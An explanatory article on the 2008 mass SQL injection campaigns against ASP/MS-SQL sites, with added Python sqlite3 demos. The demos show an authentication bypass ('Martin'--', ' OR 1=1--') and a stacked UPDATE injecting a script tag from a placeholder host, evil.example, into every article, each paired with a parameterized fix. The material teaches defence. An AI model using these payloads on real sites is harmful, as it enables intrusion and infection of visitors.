Several SQL injection attacks have been carried out on the Internet since the beginning of 2008.
They led to the release of two "potential danger" notices (CERT-IST/DG-2008.003 and CERT-IST/DG-2008.005), a "VulnCoord" (VulnCoord-2008.010) and a crisis management hub [Infections web].
We thought it worthwhile to summarise these attacks in an article.
Principle of SQL injection attacks
These attacks are carried out against a website that dynamically builds SQL queries from data entered by its users.
To recall the principle, we will take the classic example of a web page containing an authentication form with a username field and a password field.
When the user submits the form, a URL like the following is sent to the website (in practice such a form should be POSTed, since values in the URL end up in server and proxy logs, but that does not change the injection itself):
https://site-web/dossier?username=xxxxx&password=xxxxx
The website then builds an SQL query like the following to look the user up in its database:
SELECT * FROM users WHERE user = '$user' AND password = '$password'
If a malicious person who knows that a user named 'Martin' exists submits the following string in the username field:
Martin'--
the query is then processed as:
SELECT * FROM users WHERE user = 'Martin'--' AND password = '$password'
The attacker is then authenticated as "Martin" without having to supply Martin's password.
Note: the sequence "--" is the SQL comment marker (on MS-SQL it works immediately after the quote; MySQL requires a space after "--", where "#" or "/*" serve the same purpose). In our example it is used to bypass the password check by commenting out the rest of the query.
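The bypass described above, as an added example that is not part of the original article. It uses Python's built-in sqlite3 standing in for the site's database (SQLite accepts the same "--" comment marker as MS-SQL), a constructed users table with one user and a made-up password, and shows the same query first built by string substitution, as on the page, then with bound parameters; the "' OR 1=1--" payload is one of the "various forms" the article alludes to, usable without knowing any username.

```python
import sqlite3


def make_users_db():
    """Constructed in-memory users table standing in for the site's database
    (assumption: the page gives no schema beyond the two columns it queries)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Martin', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """Builds the statement by substituting the form fields into the SQL text,
    exactly as the page's $user / $password example does."""
    sql = f"SELECT * FROM users WHERE user = '{user}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, user, password):
    """Same query with bound parameters: the quote and the '--' stay inside the
    value and are never seen by the SQL parser, so the WHERE clause is intact."""
    sql = "SELECT * FROM users WHERE user = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def demo():
    """Runs the legitimate login and two injection payloads against both
    versions of the page and returns whether each one was authenticated."""
    conn = make_users_db()
    return {
        # legitimate credentials work in both versions
        "legit_vulnerable": login_vulnerable(conn, "Martin", "correct-horse"),
        "legit_safe": login_safe(conn, "Martin", "correct-horse"),
        # the page's payload: closes the quote, comments out the password check
        "martin_bypass_vulnerable": login_vulnerable(conn, "Martin'--", "anything"),
        "martin_bypass_safe": login_safe(conn, "Martin'--", "anything"),
        # variant needing no username at all: WHERE user = '' OR 1=1--...
        "or_true_vulnerable": login_vulnerable(conn, "' OR 1=1--", "anything"),
        "or_true_safe": login_safe(conn, "' OR 1=1--", "anything"),
    }


if __name__ == "__main__":
    for name, authenticated in demo().items():
        print(f"{name}: {'authenticated' if authenticated else 'rejected'}")
```

Binding the values is the fix; escaping quotes by hand is not, because the second payload never needs to break out of a numeric or otherwise unquoted context the way this one does.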
Variants of this attack make it possible to read or modify, without authorisation, the information stored in a database.
What is specific about the attacks of recent months
The general idea of these attacks is first to infect websites in order to then attack the victims who browse them.
The attacked websites have the following characteristics:
- they are built around a database that stores editorial content which the web server uses to generate dynamic pages;
- they were developed in a Windows environment (ASP pages, MS-SQL database);
- they contain SQL injection vulnerabilities.
In the first phase of the attack, SQL injection is used to insert malicious HTML tags, "<script>" (JavaScript) or "<iframe>" (which embeds a page from a third-party site), into the editorial content stored in the database.
Once the database has been altered, the dynamically generated pages carry the <script> or <iframe> tags chosen by the attackers, who can then exploit any vulnerability (Windows, Internet Explorer, ...) on the computers of the victims who view those pages.
The second phase of the attack targets the users who visit the infected websites.
The vulnerable websites are not the real target: they are used as attack vectors against the people browsing them.
Note: the SQL injection used in the first phase exploits vulnerabilities in the web applications themselves, not in the underlying software (IIS, SQL Server, ...). Patching the server does not close the hole; the application code has to be fixed.
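The two phases described above, as an added example that is not part of the original article. It models a content page of the kind the article describes with Python's built-in sqlite3 standing in for MS-SQL: a constructed articles table, a made-up attacker script host (evil.example), a page that concatenates its id parameter into the SQL, and a small helper that runs every ";"-separated statement of a batch, because accepting such stacked queries is the MS-SQL behaviour the attackers relied on (SQLite's execute() refuses them). It also includes the check a site operator would run afterwards: how many content rows now carry an injected tag.

```python
import sqlite3

# Constructed placeholder for the attacker's script host (the page names none).
EVIL_SCRIPT = '<script src="http://evil.example/e.js"></script>'


def make_site_db():
    """Constructed editorial database standing in for the ASP site's MS-SQL
    content store (assumption: the page gives no schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO articles VALUES (1, 'Welcome', '<p>Hello</p>')")
    conn.execute("INSERT INTO articles VALUES (2, 'News', '<p>Second article</p>')")
    conn.commit()
    return conn


def run_batch(conn, sql):
    """Emulates a driver that executes every ';'-separated statement of a
    batch, as MS-SQL does (stacked queries). The naive split is enough for the
    constructed payload, which contains no ';' of its own."""
    rows = []
    for stmt in sql.split(";"):
        if stmt.strip():
            rows = conn.execute(stmt).fetchall()
    conn.commit()
    return rows


def render_article_vulnerable(conn, article_id):
    """Page that concatenates the query-string value straight into the SQL."""
    sql = f"SELECT title, body FROM articles WHERE id = {article_id}"
    rows = run_batch(conn, sql)
    if not rows:
        return ""
    title, body = rows[0]
    # The CMS stores HTML in 'body' on purpose and emits it raw: any tag that
    # reaches the column reaches every visitor of the page.
    return f"<h1>{title}</h1>{body}"


def render_article_safe(conn, article_id):
    """Same page with the id validated as an integer and bound as a parameter;
    nothing in the request is ever parsed as SQL."""
    try:
        article_id = int(article_id)
    except ValueError:
        return ""
    row = conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    if row is None:
        return ""
    title, body = row
    return f"<h1>{title}</h1>{body}"


def count_poisoned(conn):
    """Operator's check: rows whose editorial content carries an injected tag."""
    (n,) = conn.execute(
        "SELECT COUNT(*) FROM articles WHERE body LIKE '%<script%' OR body LIKE '%<iframe%'"
    ).fetchone()
    return n


def demo():
    # Phase one: a single request appends the tag to every article. On MS-SQL
    # the concatenation operator would be '+'; SQLite uses '||'.
    payload = f"1; UPDATE articles SET body = body || '{EVIL_SCRIPT}'"
    conn = make_site_db()
    before = count_poisoned(conn)
    render_article_vulnerable(conn, payload)
    after = count_poisoned(conn)
    # Phase two: an ordinary visitor requests article 1 and gets the tag.
    victim_page = render_article_vulnerable(conn, "1")
    # Hardened page: the same payload is rejected and the database untouched.
    safe_conn = make_site_db()
    render_article_safe(safe_conn, payload)
    return {
        "before": before,
        "after": after,
        "victim_page": victim_page,
        "safe_db_poisoned": count_poisoned(safe_conn),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The UPDATE touches no single article: the injected statement rewrites the whole column, which is why one vulnerable parameter on one page was enough to poison every page the site generated from that table.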
These attacks were surprising in their scale (tens or even hundreds of thousands of infected websites), for two reasons:
- A malicious tool that automates these attacks exists. SANS obtained such a tool and analysed it. It contains a (customisable) search engine that uses Google to identify vulnerable websites; once they are found, the tool performs SQL injection attacks against them and injects (also configurable) malicious tags into their pages.
- A tool of this type has been integrated into the "Asprox" botnet, which lets the botnet infect vulnerable websites and then, in a second step, spread to the systems of the victims who visit them.
For more information: